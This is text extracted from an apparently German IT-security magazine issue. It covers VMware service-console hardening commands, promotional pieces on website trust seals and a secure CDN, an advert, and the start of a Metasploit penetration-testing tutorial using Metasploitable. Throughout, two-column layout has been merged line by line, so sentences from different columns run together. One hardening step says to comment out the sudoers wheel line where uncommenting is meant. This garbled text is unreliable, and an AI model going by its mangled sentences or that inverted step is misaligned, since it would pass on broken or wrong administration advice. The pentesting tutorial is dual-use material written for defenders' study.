• Angriffe gegen den Festplattenspeicher sentiell für eine erfolgreiche Umsetzung. Die richtige
Technik und funktionierende Produkte müssen sorgfäl-
Da die Servicekonsole die meisten Schwachstel- tig ausgewählt werden. Auf diesen Schritt folgt die Ver-
len aufweist, stellt sie einen der größten Gefahren- teilung der Kompetenzen in einer virtuellen Infrastruktur
herde dar. Sollte ein Angreifer Zugang erlangen und um einen reibungslosen Betrieb und eine klare Abgren-
über root-Rechte verfügen, besitzt er die volle Verwal- zung der Aufgaben zu gewährleisten.
tungskontrolle über den Host. Auf diese Weise könnte Bei der Einsatzplanung für den Virtualisierungsser-
er Netzwerkeinstellungen manipulieren oder die Res- ver müssen jedoch ein paar Besonderheiten beachtet

Abbildung 4. Zusammenfassendes Angriffsszenario

hakin9.org/de 23
PRAXIS

werden. Da auf ihm mehrere virtuelle Maschinen be- den. Um Ressourcenengpässe früh zu erkennen, muss
trieben werden, sollte vorher bestimmt werden, wie viel ein Prozess integriert werden. Nur so kann man schnell
Prozessorleistung, Hauptspeicher und Festplattenplatz genug darauf reagieren.
benötigt wird. Dazu müssen die Performance und der
Ressourcenverbrauch für die geplanten virtuellen Ma- Sichere Konfiguration virtueller Maschinen
schinen ermittelt werden. Virtuelle Maschinen sind in erster Linie genauso zu be-
Möchte man bereits vorhandene physische Systeme handeln und zu modellieren wie physische Maschinen.
virtualisieren, kann der Ressourcenbedarf für die ein- Es sollte aber darauf geachtet werden, dass den virtu-
zelnen Systeme nicht einfach addiert werden. Das BSI ellen Maschinen der Zugang zu Geräten oft erst noch
empfiehlt hier, die Performance der verschiedenen Sys- gewährt werden muss (z.B. DVDLaufwerk). Diese Ge-
teme zu messen und auf dieser Basis die Werte fest- räte können meist aus der virtuellen Maschine über die
zulegen. Außerdem sollte man beachten, dass die Vir- Gastwerkzeuge gesteuert werden.
tualisierungssoftware (Snapshots, Auslagerungsdatei,
Ereignisprotokolle) sowie der Hypervisor (Servicekon- Sicherung der Servicekonsole
sole) weitere Ressourcen benötigen. Die Sicherung der Konsole ist möglich, indem sie mithil-
fe eines abgeschotteten Managementnetzwerkes sepa-
Einsatzplanung für virtuelle Maschinen riert wird. Dafür sollte eine eigene Netzwerkkarte sowie
Um einen reibungslosen Betrieb der virtuellen Maschi- eine VLAN-ID vorgesehen werden.
nen gewährleisten zu können, muss bezüglich ihrer Le- Anschließend sollte der root-Zugriff eingeschränkt
benszyklen vielerlei beachtet werden. Bevor die virtu- werden, da dieser eine enorme Bedeutung für die Ver-
ellen Maschinen in Betrieb genommen werden, sollten waltung von Dateien und Diensten hat. Zudem muss
ihre realistischen und angemessenen Ressourcenan- ein kompliziertes root-Passwort gewählt werden, das in
forderungen bestimmt werden. Danach ist zu prüfen, bestimmten Zeitabständen erneuert wird. Der Zeitab-
ob eventuelle Leistungseinschränkungen bei gelegent- stand kann mithilfe des folgenden Befehls in der Kon-
lichen Lastspitzen hingenommen werden können oder sole festgelegt werden:
nicht. Zusätzlich muss die Performance virtueller Ma-
schinen überwacht werden, um sicherzustellen, dass esxcfg-auth --passmaxdays=[Anzahl-der-Tage]
die Ressourcenanforderungen ausreichend erfüllt wer- Bsp. esxcfg-auth --passmaxdays=30

Abbildung 5. Separierung der Servicekonsole

24 1/2011
Schwachstellen bei der Ressourcenoptimierung im virtuellen Raum

Damit nicht jeder Benutzer mittels sudo oder su root- Voraussetzungen für die empfohlenen Maßnahmen
Rechte erlangen kann, wird eine wheel-Gruppe be- der BSI sind fachkundige und speziell geschulte Mit-
nutzt. Benutzer die in den root-Modus wechseln dür- arbeiter. Hier sollte nicht gespart werden. Eine falsche
fen, müssen mit folgendem Befehl in die wheel-Grup- Planung und nicht vorhandenes Fachwissen können zu
pe hinzugefügt werden: einer späteren Behinderung oder sogar zu einem Aus-
fall des Produktivbetriebs führen. Damit ein fortlaufen-
usermod -G wheel Benutzer Bsp. usermod -G wheel Max der und reibungsloser Betrieb möglich ist, sollte also
nur einschlägig ausgebildetes Personal mit und in den
Als nächstes wird der su-Befehl angepasst, damit nur virtuellen Welten arbeiten.
root und die wheel-Gruppe die root-Rechte besitzen.
Dies geschieht mittels: Sicherung zwischen Internet und virtueller
Welt
chgrp wheel /bin/su Besitzen virtuelle Maschinen eine Verbindung zum In-
chmod 4750 /bin/su ternet, ist selbstverständlich auch hier eine Sicherheits-
software erforderlich. Diese kann als virtuelle Lösung
Damit die wheel-Gruppe den sudo-Befehl nutzen oder in Form einer Hardware-Lösung bereitgestellt wer-
kann, muss die /etc/sudoers mittels Befehl visudo in den. Stellt beispielsweise ein Unternehmen seine vor-
einem Editor gestartet und editiert werden. Dabei wird handene physische Infrastruktur auf eine virtuelle um
die Zeile #%wheel ALL = (ALL) ALL auskommentiert. und besitzt eine Hardware-Firewall- und Antivirus-Lö-
Einen zusätzlichen Schutz der Servicekonsole bietet sung, so kann diese weiterhin verwendet werden. Es
die integrierte Firewall, die standardmäßig schon auf entstehen keine weiteren Kosten für das Unternehmen.
einer hohen Sicherheitsstufe eingestellt ist. Soll die Firewall selbst in einer virtuellen Maschine be-
trieben werden, muss diese aus Sicherheitsgründen auf
Sicherer Betrieb von virtuellen einem eigenen Host installiert werden. Dadurch entste-
Infrastrukturen hen für das Unternehmen zusätzliche Software- und
Wenn ein Fehler auf einem Virtualisierungsserver ent- Hardware-Kosten, die sich nur rechnen, wenn mehre-
steht, kann dieser Auswirkungen auf alle virtuellen Ma- re Sicherheitslösungen auf dem Host betrieben werden
schinen haben die auf ihm betrieben werden. Mithilfe sollen. Ansonsten empfiehlt es sich, zu einer Hardware-
von webbasierten Administrationsoberflächen oder ei- Lösung zu greifen. Virtuelle Systeme. die keinen Zu-
ner Administrationssoftware (VMware vSphere Client, gang zum Internet besitzen, können mittels einer ein-
VMware vCenter), kann man lokal und über das Netz fachen Firewall-Software überwacht werden. Bei einem
auf einen Virtualisierungsserver zugreifen. Somit hat sehr geringen Schutzbedarf, beispielsweise bei einem
man die Möglichkeit den Server oder dessen virtuelle einfachen Test-System, reicht meist schon die in Win-
Maschinen zu steuern, zu warten oder zu überwachen. dows Systemen integrierte Firewall aus.
Ein weiterer Punkt ist die Überwachung des Betriebszu-
standes. Die Auslastung der Ressourcen sollte kontinuier- Ausblick
lich geprüft werden. Nur so kann ermittelt werden, ob aus- VMware hat dieses Sicherheitsproblem erkannt und mit
reichend Prozessorressourcen zur Verfügung stehen, die der Einführung der vShield Zones und der VMsafe API
den Performanceanforderungen der virtuellen Maschinen minimiert. Durch eine Zusammenarbeit mit zahlreichen
genügen. Ob Hauptspeicherengpässe vorliegen, die die Security-Software Herstellern wie beispielsweise McA-
Verfügbarkeit der virtuellen Maschinen gefährden könn- fee, Kaspersky oder Trend Micro können neue Sicher-
ten, muss ebenfalls kontrolliert werden. Besonders bei der heitskonzepte entwickelt werden und so die Sicherheit
Verwendung des Memory Overcommitments sollte ein in einer virtuellen Infrastruktur immer weiter vorantrei-
Prozess etabliert werden, der den Hauptspeicher ständig ben. Einige Vorreiter wie die Deep Security Lösung von
überwacht und einen drohenden Engpass früh erkennt. Trend Micro gibt es bereits und es werden sicherlich
Diese Überwachungsaufgaben können automatisiert wer- weitere folgen.
den und zum Beispiel durch E-Mail-Benachrichtigungen
über Unregelmäßigkeiten informieren.
STEVE HAMPICKE
Im Internet Abgeschlossenes Studium (Diplom FH) der Automatisierungstech-
• http://www.vmachine.de nik/ Computersystemtechnik Diplomarbeit bei PC-WARE beschäftig-
• https://www.bsi-fuer-buerger.de/cln_030/ContentBSI/Aktuel- te sich mit dem Thema „Analyse sicherheitsrelevanter Ressour-
les/Veranstaltungen/gstag/gstag_160310.html cenoptimierung in virtuellen IT-Infrastrukturen“ beschäftigt
• http://www.vmware.com
sich weiterhin in seiner Freizeit mit VMware-Lösungen
• http://www.pc-ware.com
Kontakt mit dem Autor: steve.hampicke@googlemail.com

hakin9.org/de 25
Malware-Scan mittels Comodo
HackerProof oder VeriSign Trust Seal
Christian Heutger, Geschäftsführer PSW Group
Bedingt durch die Befürchtung vieler Verbraucher, beim
Einkauf im Internet Opfer von Identitäts- beziehungsweise
Datendiebstahl zu werden, entgingen Online-Händlern
allein im Jahr 2008 Umsätze in Höhe von 21 Milliarden
US-Dollar. Das ergaben Studien von VeriSign, einem
Spezialisten für Zertifikatslösungen im Internet.

IN DIESEM ARTIKEL ERFAHREN SIE… WAS SIE VORHER WISSEN SOLLTEN…


• Wie die Vertrauenswürdigkeit und Sicherheit einer Website • Der wirtschaftliche Schaden für Online-Händler aufgrund
durch kombinierte Lösungen gewährleistet werden kann mangelnden Vertrauens vieler Verbraucher in die Sicherheit
• Einzelheiten über das bekannteste Gütesiegel im Internet der Website kostete im Jahr 2008 rund 21 Milliarden US-Dollar.
• Grundkenntnisse über die Sicherheitsstandards der Payment
Card Industry (PCI)

F
ür Online-Shop- und Website-Betreiber gilt es da- dere wird geprüft, ob die Website anfällig für Deni-
her Lösungen zu finden, mit deren Hilfe sie Be- al-of-Service-Attacken ist, der Server über offene
suchern ihrer Website, also potenziellen Kunden, beziehungsweise ungeschützte Ports verfügt, un-
aufzeigen können, dass sie sich auf einer vertrauens- sichere Protokolle oder nicht gepatchte Software
würdigen, sicheren Website befinden, die täglich auf ausführt. Hierzu simuliert der HackerProof-Server
Schadcode, Malware und sonstige Schwachstellen hin wirklichkeitsnahe aber nicht schädliche Angriffe auf
gescannt wird. den entsprechenden Web-Server. Am Ende eines
Diese Möglichkeit bieten ihnen das Gütesiegel des jeden Scans generiert die Lösung einen detaillier-
Comodo HackerProof und das VeriSign Trust Seal, die ten Report, in dem sämtliche Schwachstellen prä-
wir Ihnen im Rahmen dieses Beitrages samt der dahin- zise aufgelistet sind und für die bei Bedarf eine Lö-
ter steckenden technischen Lösungen näher vorstellen. sung vorgeschlagen wird.
• SiteInspector: Das Frühwarnsystem
Comodo HackerProof: Zum integralen Bestandteil seines HackerProof
Simulierte Attacken und Frühwarnsystem hat Comodo mit dem SiteInspector ein intelligen-
Der Comodo HackerProof kombiniert unterschiedlichs- tes Frühwarnsystem auserkoren. Der SiteInspec-
te Lösungen, um die Sicherheit und Vertrauenswürdig- tor simuliert den Besuch der Website durch einen
keit von Websites zu gewährleisten und zu signalisie- potenziellen Kunden und überprüft dabei das Sys-
ren: tem auf die spezifischen Gefahren, denen Besu-
cher der Website ausgesetzt sind. Infizierte Seiten,
• Simulierte Attacken und Malware-Scans im die etwa das Betriebssystem des Besuchers schä-
24h-Takt digen könnten, werden unmittelbar gemeldet und
Alle 24 Stunden prüft der ausgefeilte Scan-Algo- können daraufhin vom Website-Betreiber entfernt
rithmus des Comodo HackerProof die Website des werden. SiteInspector geht damit einen Schritt wei-
Anwenders auf Sicherheitslücken, die durch Ha- ter als herkömmliche Scanning-Services, indem die
cker ausgenutzt werden könnten. Zum Einsatz Sicherheit einer Website aus Sicht des Besuchers
kommt dabei eine ganze Batterie an Schwachstel- überprüft wird.
len-Tests. Der Scan wird automatisch seitens des • PCI-Scanning: Den Sicherheitsstandards der
Comodo HackerProof-Servers initiiert. Insbeson- Kreditkartenindustrie entsprechen

26 1/2011
Malware-Scan mittels Comodo HackerProof oder VeriSign Trust Seal

Ebenfalls mit an Bord hat der HackerProof das so- merce erzielt werden konnten. So misst das Feature
genannte PCI-Scanning. Es erfolgt vierteljährlich beispielsweise, wie oft die Besucher der Website,
und überprüft die Website auf die Erfüllung der den Mouse-Over-Effekt des Trust-Mark genutzt ha-
hochgradige Sicherheit garantierenden Standards ben, um die Sicherheit der Website näher zu verifi-
der Payment Card Industry (PCI). Diese sehen zieren.
unter anderem die „Installation und Pflege einer
Firewall zur Absicherung aller Daten“, die „Ent- Comodo HackerProof:
wicklung und Pflege sicherer Systeme und An- Die wichtigsten Merkmale
wendungen“ und „kontinuierliche Prüfungen aller • Täglicher, umfassender Scan der Website auf Si-
Sicherheitssysteme und –prozesse“ für Website- cherheitslücken, Malware und andere Schwach-
Betreiber, die Kreditkartendaten verarbeiten, zwin- stellen, die durch Hacker ausgenutzt werden kön-
gend vor. nen.
• Comodo HackerProof-Siegel: Sicherheitszer- • Innovative SiteInspector-Technologie schützt Web-
tifikat mit Mouse-Over-Effekt site-Besucher vor Drive-by-Attacken und anderem
Eine wichtige Komponente des HackerProof – ge- schädlichem Website-Content.
rade im Hinblick auf die Vertrauensbildung im E- • Integriertes PCI-Scanning zur Umsetzung der Si-
Commerce – ist das Trust-Mark. Es bescheinigt cherheitsstandards der Kreditkartenindustrie.
und verifiziert die Sicherheit der besuchten Web- • Webbasiertes Management des HackerProof: Re-
site in Echtzeit. Das „Sicherheitszertifikat“ wird vom porting-Funktionalitäten geben Aufschluss über
Website-Betreiber per JavaScript in seine Web- Schwachstellenbehebungen, Testergebnisse und
site integriert und offenbart, wann die Website zum Return-on-Investment.
letzten Mal dem HackerProof-Scan unterzogen • Besuchern via Mouse-Over Informationen über
worden ist. Eine Besonderheit ist, dass es mit ei- Tests und verifiziert die Sicherheit der Website in
nem Mouse-Over-Effekt ausgestattet ist. Bewegt Echtzeit.
der Besucher der Website seinen Mauszeiger über • Patentierte Trust-Mark-Technologie trägt für Aus-
das Trust-Mark werden ihm weitere Informationen fallsicherheit und einfache Einbindung in die Web-
zum letzten Scan-Zeitpunkt und dem HackerProof site (ohne Layout-Änderungen) Sorge.
angezeigt.
VeriSign Trust Seal: Hoher Bekanntheitsgrad
Comodo HackerProof: gepaart mit Malware-Scan und Betreiber-
Webbasiertes Management-Tool Authentifizierung
Der Comodo HackerProof ist ein reines Online-Tool. Das VeriSign Trust Seal ist eine Erweiterung des Ve-
Installationen auf Clients sind somit nicht erforder- riSign Seal, einem der bekanntesten Sicherheitssie-
lich. Der Login in das Lösungsbundle ist über die gel im Internet, das im Durchschnitt täglich 250 Millio-
Website von Comodo möglich. Hier erlaubt ein an- nen Mal auf mehr als 90.000 Websites angezeigt wird,
wenderfreundliches Interface sowohl die komfortable unter anderem von 97 der 100 größten Banken, die
Verwaltung und Analyse als auch die Auswertung der SSL-Zertifikate verwenden. Anders als beim VeriSign
Umsatzsteigerungen, die durch den vertrauensbil- Secured Seal kommt das Trust Seal zum Zug, wenn
denden Einsatz des Comodo HackerProof im E-Com- keinerlei SSL-Zertifikate genutzt werden. Kommen
SSL-Zertifikate auf einer Website aber doch zur An-
wendung, muss der Website-Betreiber zwingend auf
VeriSign SSL zurückgreifen, um ein Trust Seal zu er-
halten.
Das VeriSign Trust Seal basiert im Wesentlichen auf
vier Features:

• Authentifizierung
Als vertrauenswürdige dritte Partei prüft VeriSign
die Identität des Website-Betreibers und stellt si-
cher, dass er der rechtmäßige Inhaber der Web-
site ist. Dies geschieht unter anderem anhand des
Whois-Eintrages zur betroffenen Domain. Das Sie-
gel belegt somit auf einer Website, dass deren Be-
treiber von VeriSign einwandfrei authentifiziert wer-
den konnte.

www.psw.net 27
• Täglicher Malware-Scan ren Sicherheitssiegeln unterscheidet: Das soge-
Das VeriSign Trust Seal sieht vor, dass die Web- nannte Seal-in-Search. Dabei handelt es sich um
site täglich auf Malware gescannt wird. Werden ein Feature, dass es ermöglicht, dass das Trust
in diesem Rahmen schädliche Codes festge- Seal im Zusammenhang mit der eigenen geprüf-
stellt, wird der Website-Betreiber davon per E- ten Website auch in den Ergebnislisten der gro-
Mail in Kenntnis gesetzt. In diesem Rahmen wird ßen Suchmaschinen angezeigt wird. Einzige Vor-
er aufgefordert, sich in seinen Account beim Ve- aussetzung für die Anzeige ist, dass sich der End-
riSign Trust Center einzuloggen. Dort findet der nutzer das kostenfreie Browser-Plug-in „AVG Link-
Website-Betreiber dann eine detaillierte Über- Scanner“ installiert hat. Mit Seal-in-Search kön-
sicht über die Seiten seines Web-Angebots, die nen sich Website-Betreiber bereits in den Sucher-
infiziert sind, sowie über die genauen Codes, die gebnissen mit ihren von VeriSign als sicher zerti-
die Sicherheitsprobleme verursachen. Dem Web- fizierten Webseiten von der Konkurrenz abheben
site-Betreiber wird so ermöglicht, den Schadcode und so mehr Traffic generieren. Die täglichen Mal-
schnell aufzufinden und ihn zu entfernen. Im An- ware-Scans verhindern außerdem, dass die eige-
schluss kann er einen erneuten Scan seiner ne Website dem Blacklisting von Suchmaschinen
Website beantragen. Über den gesamten Zeit- zum Opfer fällt.
raum hinweg, wird das VeriSign Trust Seal nicht
mehr auf der betroffenen Website dargestellt. Es VeriSign Trust Seal: Die wichtigsten Merkmale
erscheint erst wieder, wenn im Rahmen des er- • Herauszustreichen ist vor allem der hohe Be-
neuten Scans festgestellt worden ist, dass die kanntheitsgrad des VeriSign Trust Seal: Über 250
Malware entfernt worden ist. Millionen tägliche Einblendungen sprechen für
• Das Trust Seal sich.
Das Trust Seal selbst ist wie der Comodo Hacker- • Auch die Authentifizierung des rechtmäßigen Be-
Proof ein Erkennungszeichen, das den Besuchern treibers der Website u.a. per Whois-Datenabgleich
einer Website signalisiert, sich auf einer sicheren, stellt ein wichtiges Merkmal des Siegels dar.
vertrauenswürdigen Seite zu befinden. Bei Klick • Täglicher, umfassender Scan der Website auf Mal-
auf das Siegel öffnet sich die so genannte „Veri- ware.
Sign Trust Seal Verification Page“. Sie beinhal- • Online-Zugriff über das VeriSign Trust Center auf
tet Informationen über die Website sowie über die Reporting-Funktionalitäten. Hier findet sich bei Mal-
Identität des rechtmäßigen Website-Betreibers, ware-Befall eine detaillierte Aufschlüsselung aller
die von VeriSign im Vorfeld verifiziert wurde. Hier- infizierten Seiten.
zu zählen Name, Ort und Land. Außerdem können • Zeitnaher Re-Scan nach der Beseitigung von
Besucher auf der Verification Page feststellen, wie Schadcode.
der jüngste Malware-Scan verlaufen ist. Mit die- • Schutz vor Aufnahme der eigenen Website in die
ser Transparenz ist sichergestellt, dass die Besu- Blacklists von Suchmaschinen.
cher der Website darauf vertrauen können, dass • Mehrwert im Suchmaschinen-Marketing dank der
die Website nicht von Hackern manipuliert wor- Seal-in-Search-Technologie.
den ist. Das VeriSign Trust Seal kann vom Web- • Transparenz für die Website-Besucher dank den
site-Betreiber erst nach erfolgter Identifizierung Auskünften der VeriSign Trust Seal Verification
sowie erstem Malware-Scan per Copy and Paste Page.
in die Website integriert werden. • Schnelle und simple Einbindung des Siegels per
• Seal-in-Search Copy and Paste.
Das VeriSign Trust Seal umfasst neben der Au-
thentifizierung des Website-Betreibers ein wei- Fazit
teres interessantes Feature, das es von ande- Der Erfolg gibt den digitalen Gütesiegeln Recht. So be-
legen etwa Untersuchungen der Comodo Group, dass
78 Prozent der Online-Shopper einem Gütesiegel wie
dem Comodo HackerProof oder dem VeriSign Trust
Seal glauben, dass ihre Daten sicher sind. Und Stu-
dien von VeriSign konnten nachweisen, dass die On-
line-Verkäufe und Konversionen auf Websites, die über
ein VeriSign-Siegel verfügen, um bis zu 34 Prozent ge-
steigert werden konnten.

28 1/2011
Die rasche Auslieferung statischer Inhalte mittels Secure CDN

Die rasche Auslieferung statischer Inhalte


mittels Secure CDN
- Weil auch bei der Sicherheit die Geschwindigkeit zählt
Christian Heutger, Geschäftsführer PSW Group
Bei der Übertragung von Inhalten ist auf Websites und in
Online-Shops die Geschwindigkeit einer der wesentlichsten
Erfolgsfaktoren: Denn Kundenbindung sowie ein gutes Listing
in Suchmaschinen sind im Internet eben auch von der Höhe der
Geschwindigkeit abhängig, mit der Inhalte – ganz gleich ob Texte,
Bilder, Flash-Content, Scripts oder Videos – geladen werden.

IN DIESEM ARTIKEL ERFAHREN SIE… WAS SIE VORHER WISSEN SOLLTEN…


• Höchste Sicherheit gepaart mit modernster Server-Technolo- • Ein gutes Listing in Suchmaschinen sowie Kundenbindung
gie liefert das Secure Content Delivery Network (Secure CDN). hängen im e-Commerce wesentlich von der Ladezeit (Ge-
• Mittels HTTPS beinhaltet Secure CDN eine sichere Ausliefe- schwindigkeit) der Website-Inhalte ab
rung großer Datenaufkommen. • Grundkenntnisse über die Funktionsweise / Aufbau des Do-
main Name Systems bzw. von Netzwerkdiensten

I
ndem sie dafür sorgt, dass Besucher Freude an einer Angeles, Ashburn, New York, Chicago, Dallas, Atlanta,
„schnellen“ Website haben und sie dadurch öfter besu- Seattle, London, Frankfurt, Paris, Hong Kong, Singapur,
chen sowie länger auf ihr verweilen, übt die Lade-Ge- Tokio und Sydney zurückgreift. Dort sind die POPs au-
schwindigkeit einen wesentlichen Einfluss auf die Quali- ßerdem in Tier 1-Rechenzentren untergebracht, was die
tät eines Websitebesuchs und damit auf den Umsatz aus. POPs zu so genannten „Super POPs“ mutieren lässt, die
auf robusten Backbone, vielfacher Redundanz und dar-
Content Delivery Networks (CDN) aus resultierend hoher Verfügbarkeit basieren.
Um eine möglichst hohe Übertragungsgeschwindig-
keit zu erreichen, bietet sich die Nutzung eines Content Klassisches CDN vs. Second-Generation-CDN
Delivery Networks (CDN) an. Als Geflecht über das In- (EdgeCast CDN)
ternet verbundener Server, ermöglicht es eine Auslie- Das klassische CDN …
ferung statischer Inhalte wie Grafiken, Bilder und Ja-
vaScripts vom jeweils nächstgelegenen Server aus. • verlässt sich voll und ganz auf DNS, um die jewei-
Auch Software-Downloads, Video-Streams oder der lige Position des auf Inhalte zugreifenden Endnut-
Betrieb von Online-Games wird in hoher Geschwindig- zers zu ermitteln.
keit ermöglicht. Um dies zu erreichen, liefern klassische • benötigt 8 Schritte, um den Nutzer zuverlässig mit
CDNs Inhalte von vielen kleinen Standorten aus. dem gewünschten Content zu beliefern:
Um die Übertragungsgeschwindigkeit weiter zu opti- • Der Endnutzer fragt eine IP-Adresse für content.
mieren, ist es allerdings sinnvoller, nur wenige, strate- domain.com an, um die dort hinterlegten Inhalte
gisch platzierte Points of Presence (POPs) zu betrei- abzurufen.
ben. Die POPs sollten in unmittelbarer Nähe zu den • Der ISP des Nutzers fordert beim Root-Server
wichtigsten Internetknoten weltweit liegen und dadurch die IP-Adressen der autoritativen Domain-Na-
direkt mit allen großen Netzwerken verbunden sein. me-Server von domain.com an.
CDNs, die dieser Strategie folgen, werden als CDNs • Der Root-Server liefert als Antwort die IP-Ad-
der zweiten Generation betrachtet. ressen der autoritativen DNS-Server zurück.
Ein eben solches 2nd-Generation-CDN ist das renom- • Der DNS-Server des ISP greift willkürlich auf ei-
mierte EdgeCast CDN, das strategisch entsprechend nen der autoritativen DNS-Server zurück, wobei
vorteilhaft positioniert ist und auf POPs in San Jose, Los die Distanz zwischen dem DNS-Server des ISP

www.psw.net 29
und dem autoritativen DNS-Server sehr groß • Der EdgeDirector stellt sicher, dass der Nutzer
sein kann. auch weiterhin über den für ihn vorteilhaften POP
• Der autoritative DNS-Server antwortet mit der Inhalte ausgeliefert bekommt.
Adresse eines der Delivery-Server des betroffe- • Tritt bei dem POP in Sydney aber ein Problem auf,
nen Netzwerkes, das dem DNS-Server des ISP verbindet der EdgeDirector den Nutzer mit dem
am nächsten liegt. POP in Hong Kong. Denn dieser ist nach dem POP
• Erst jetzt kann der DNS-Server des ISP den Nutzer in Sydney der dem Nutzer geografisch am nächst-
mit der IP-Adresse des Delivery-Servers versorgen. gelegenen POP.
• Der Nutzer fragt dann den Delivery-Server an. • Steht der POP in Sydney dann wieder zur Verfü-
• Der Delivery-Server beantwortet die Nutzer-An- gung und erweist sich als der für den Nutzer effek-
frage und der Nutzer bekommt die gewünschten tivste lokale POP, so bekommt der Nutzer die Inhal-
Inhalte geliefert. te künftig wieder über diesen geliefert.

Das EdgeCast CDN … Wie das „Secure“ zum CDN kommt


Das EdgeCast CDN kann als Secure CDN bezeich-
• arbeitet unabhängig von DNS. net werden. Denn das CDN der zweiten Generation
• cacht DNS-Einträge über längere Zeiträume hinweg, ist neben seiner hohen Performance zusätzlich mit Si-
sodass anders als bei klassischen CDNs nicht jedes cherheitsmerkmalen wie dem Support des HyperText
Mal eine DNS-Abfrage durchgeführt werden muss. Transfer Protocol Secure (HTTPS) ausgestattet. Damit
• greift auf die patentierte EdgeDirector-Technologie können Daten und Inhalte „abhörsicher“, da verschlüs-
zurück (im nächsten Abschnitt erfahren Sie mehr selt, aber dennoch weiterhin in hoher Geschwindigkeit
über deren Funktionsweise) übertragen werden.
• benötigt nur 4 Schritte, um den Nutzer zuverlässig Als weitere Sicherheitsfunktionen kommen die Unter-
mit dem gewünschten Content zu beliefern: bindung von Direkt-Verlinkungen mittels Token-Authen-
• Der Endnutzer fragt eine IP-Adresse für content. tifizierung, die Geo-Filterung, die Benutzerzugangsbe-
domain.com an, um die dort hinterlegten Inhalte schränkung anhand von IP-Adressen und die SWF- und
abzurufen. Token-Authentifizierung in Verbindung mit Flash-Strea-
• Der DNS-Server vom ISP des Nutzers antwor- ming hinzu.
tet unmittelbar auf die DNS-Anfrage und greift
dabei auf den Cache zurück. Merkmale des EdgeCast CDN
• Der EdgeDirector leitet den Nutzer zu dem
nächstgelegenen Delivery-Server. • Schnelle Auslieferung von Inhalten unter anderem
• Der Delivery-Server beliefert den Nutzer mit den Dank patentierter EdgeDirector-Technologie.
gewünschten Inhalten. • Weitgehend unabhängig von DNS.
• Hohe Sicherheit: HTTPS-Support, Token-Authen-
Zur Funktionsweise tifizierung, Geo-Filterung, Benutzerzugangsbe-
der EdgeDirector-Technologie schränkung, Möglichkeit der Bandbreitendrosse-
Durch ein kontinuierliches Monitoring generiert die paten- lung.
tierte EdgeDirector-Technologie stets aktuelle Übersich- • Für Auslieferung von Rich Media-Elementen wie
ten über alle aktiven IP-Blöcke sowie über die Geschwin- hochauflösende Videos oder Live-Streamings opti-
digkeit des Zugriffs durch jeden IP-Block auf jeden POP. miert.
Dadurch ist sie in der Lage alle Nutzer ohne Zeitverlust • Unterstützung von On-Demand- als auch Live-
mit dem jeweiligen lokalen oder zumindest dem geogra- Streaming mittels Adobe Flash, Windows Media
fisch am nächsten gelegenen POP zu verbinden. Damit und Microsoft Silverlight.
wird wiederum eine schnelle Auslieferung von Inhalten • Höchstmaß an Flexibilität, die es erlaubt, Inhal-
über das CDN an den Nutzer realisiert. Ist ein POP einmal te entweder auf dem eigenen Server zu speichern
überlastet beziehungsweise ein anderer nächstgelegener oder auf Speicherknoten hochzuladen, um sie dort
POP weist eine bessere Performance auf, verbindet die von Cache-Servern abholen und über das Netz-
EdgeDirector-Technologie den Nutzer mit diesem, bis sein werk verteilen zu lassen.
„angestammter“ POP wieder voll funktionstüchtig ist. • Websitebetreiber kann durch benutzerdefinierte
Ein Beispiel: Regeln festlegen, wie die Serverknoten Inhalte ca-
chen und ausliefern.
• Der lokale EdgeDirector stellt fest, dass ein Nutzer • Über eine webbasierte Analyse-Suite können ak-
aus Australien stets über den POP in Sydney auf tuelle Leistungsdaten permanent eingesehen wer-
Content zugreift. den.

30 1/2011
Einfach
sicher
surfen.

Abstand schafft Sicherheit!

Angriffe auf Daten und Systeme über


Schwachstellen in internetgebundenen
Applikationen drohen täglich.
Halten Sie die Gefahren des Internets auf
Distanz – mit Remote Controlled Browser
Systems (ReCoBS) der m-privacy GmbH.

m-privacy GmbH Sehen wir uns?


Am Köllnischen Park 1 Fünfter Nationaler IT-Gipfel
10179 Berlin 7. Dezember 2010
Fon: +49 30 243423-34 Internationales Congress Center Dresden
Fax: +49 30 243423-36 www.m-privacy.de/presse/veranstaltungen
info@m-privacy.de
www.m-privacy.de
TOOLS

Das Metasploit Framework als


Unterstützung bei Penetrationstests
Alexander Winkler
Kann ein quelloffenes Pentesting-Tool an seine
kommerzielle Pendants heranreichen? Welche
Informationen eines Zielsystems brauche ich für einen
erfolgreichen Exploit? Welche Vorteile bringt das Metasploit
Framework?

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


• wie man das Metasploit Framework aufsetzt • grundlegende Kenntnisse auf der Kommandozeile
• erste Schritte im MSF
• Vor- und Nachteile des Frameworks

G
enaue und stets aktuelle Informationen zu be- sich in besonderer Weise als unterstützendes Mittel beim
sitzen ist heutzutage sehr viel wert, alles andere Pentesting. So lassen sich diverse Tools wie z.B. nmap
gleicht einem Blindflug im Düsenjet. Dies stimmt bequem einklinken und machen es somit zu einem inte-
jedenfalls auch in Verbindung mit Penetrationstest. Ein ressanten Werkzeug. Dieser Artikel wird sich ausschließ-
Test kann immer nur das widerspiegeln was überhaupt lich mit dem Metasploit Framework (MSF) auseinander-
erst entdeckt wurde. Das Metasploit Framework[1] eignet setzen. Das MSF an sich ist eines der bekanntesten Open

Abbildung 1. Metasploitable gestartet

32 10/2010
Das Metasploit Framework als Unterstützung bei Penetrationstests

Source Pentesting-Tools, die es einem ermöglichen, eine ten Ubuntu 8.04 Server in Standardkonfiguration auf dem
breite Palette an Malware an einem zu kompromittieren- verschiedene angreifbare Dienste laufen. Metasploitable
den Host auszuführen. Es ist Teil des Metasploit Projekts, liegt als VMware Image vor und kann somit direkt in einer
sehr mächtig und vermag dem Benutzer einige Werkzeu- Virtualbox-Instanz oder dem VMware-Player ausgeführt
ge an die Hand zu geben, um sich damit in verschiedenen werden. Somit wäre unser Zielsystem bereit und wartet
Netzen umzusehen. Dies wird allerdings manchmal sehr sozusagen nur darauf exploited zu werden.
kontrovers diskutiert, da es somit auch die Möglichkeit
mitbringt für unbedarfte User schnelle Ergebnisse in wo- Installation
möglich fremden Netzen zu erzielen. Aber gerade für die- Um das Framework zu laden gibt man auf der Kom-
jenigen Leute unter uns, zu deren täglichen Aufgaben es mandozeile seines Hostsystems folgenden Befehl ein:
gehört, sicherheitsrelevante Netzwerkarchitekturen bzw.
Segmente zu betreuen ist es sehr interessant dies mal svn checkout http://metasploit.com/svn/framework3/trunk/
aus einer anderen Perspektive zu sehen. Es ist vielleicht metasploit
sogar unabdingbar sich als verantwortungsbewusster Ad-
ministrator damit auseinanderzusetzen. Das MSF existiert Nun wird ein Ordner metasploit angelegt und das ca.
